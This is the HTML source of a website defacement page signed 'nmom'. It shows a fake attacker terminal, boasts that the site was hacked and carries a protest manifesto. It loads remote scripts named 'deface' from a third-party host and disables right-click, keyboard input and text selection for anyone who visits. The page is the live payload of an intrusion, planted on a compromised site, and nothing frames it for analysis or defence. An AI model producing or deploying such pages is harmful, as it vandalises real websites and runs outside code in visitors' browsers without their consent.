<html>
<head>
    <script src="" type="application/javascript"></script>
    <script type="application/javascript" src="https://nathanprinsley-files.prinsh.com/data-1/js/deface(04-02).js" ></script>
    <script type="application/javascript" src="https://nathanprinsley-files.prinsh.com/data-1/js/deface(04-03).js"></script>
<!-- nmom--><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender scripnmomt end -->
<!-- AdFender scriptnm0mbegin --><script type='text/javascript' src='http://local.adfender.com/adfender/elemhide.js'></script><!-- AdFender scnmomnomoript end -->
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script> 
    <link rel="icon" type="image/jpg" href="https://i.postimg.cc/0ymG7FPR/N-M-O-M.jpg">
<title>hacked by nmom</title>
<style>
body{ 
background-color: #000000;
background-repeat:no-repeat;
background-attachment:fixed;
background-position:center; 
font-family: LOL SECURITY; 
font-size: 27px;
}
h1 {
padding: 10px 15px;
margin: 0px;
font-size: 14px;
background-color: #000000;
//background-image: -moz-linear-gradient(100% 100% 90deg, #777, #999) !important;
//background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#999), to(#777)) !important;

color: #FFF;
//-webkit-border-radius:8px 8px 0px 0px;
//-moz-border-radius: 8px 8px 0px 0px;
border-radius: 8px 8px 0px 0px;
text-shadow:1px 1px 2px #333333;
opacity: 0.5;
}
table {
width: 565px;
}
table tr td{
font-family: verdana;
font-size: 11px;
padding: 10px 5px;
border-bottom: solid 1px #CCC;

}
#wrapper{
width: 800px;
margin: 10px auto;
text-align: left;
background: url('') no-repeat center center fixed ;
opacity:50%;
}
#console{
height: 400px;
overflow: auto;
background-color: #000;
padding: 15px;
font-family: monospace;
font-size: 12px;
color: #FFF;
}
.content{
padding: 15px;
}
#commander{
border: solid 1px #CCC;
padding: 5px 10px;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
margin: 5px;
width: 590px;
height: 30px;
}
.box{
-moz-box-shadow: 1px 1px 8px #666;
-webkit-box-shadow: 1px 1px 8px #666;
box-shadow: 1px 1px 8px #40D5D2;
border: solid 1px black;
-webkit-border-radius: 8px 8px 0px 0px;
-moz-border-radius: 8px 8px 0px 0px;
border-radius: 8px 8px 0px 0px;
margin: 15px 0px;
background-color: #F5F5F5;
opacity: 0.8;
}
#help{
width: 300px;
float: right;
}
.prefix{
color: #0077E7;
}
.keyword{
color: #9eff63;
}
.error{
color: #FF0000;
}
.spacer{
clear: both;
display: block;
}
</style>

</head>
<body background='https://s1.gifyu.com/images/S1nlB.gif' oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
<br/><br/>
<div id="wrapper">
<div class="box">
<h1>nmom@Attacker~</h1>
<div id="console"><span class="prefix">
<p id="message">
<font color="green">nmom@Attacker~$</font><font color="white"> cd  target<br>
<font color="green">nmom@Attacker~$</font><font color="aqua"> nmom@Attacker /home/Desktop/Admin/website/target <br>
<font color="green">nmom@Attacker~$</font><font color="white"> ls<br>
<font color="green">nmom@Attacker~$</font><font color="white"> <font color="white" size="3px">NMOM.A</font> <br>
<font color="green">nmom@Attacker~$</font><font color="white"> cd NMOM.A<br>
<font color="green">nmom@Attacker~$</font><font color="white"> This website has been hacked<br>
<font color="green">nmom@Attacker~$</font><font color="white"> It was not difficult!<br>
<font color="green">nmom@Attacker~$</font><font color="white"> <font color="red" size="3px">exit</font><br>

<br>
<font color="lime" size="5px">=====================HACKED BY N.M.O.M====================</font><br>
<font color="white">« Wherever technology is, we're looking at you
Hello people all over the world, you are receiving this message from Nmom.
Undoubtedly, by now you have noticed that this site has been hacked.
We will never hack an organization without purpose.
This is a message to wake you up!
Wake up to make our voice heard!
A voice full of anger and sadness 
We have no right to be angry and upset 
Now it's our turn to be happy! »
<br>
<font color="lime" size="5px">==========================================================
<br>
<script type="text/javascript">
new TypingText(document.getElementById("message"), 50, function(i){ var ar 

= new Array(">", ">", ">", ">"); return " " + ar[i.length % ar.length]; });

//Type out examples:
TypingText.runAll();

</script>
</body></html>
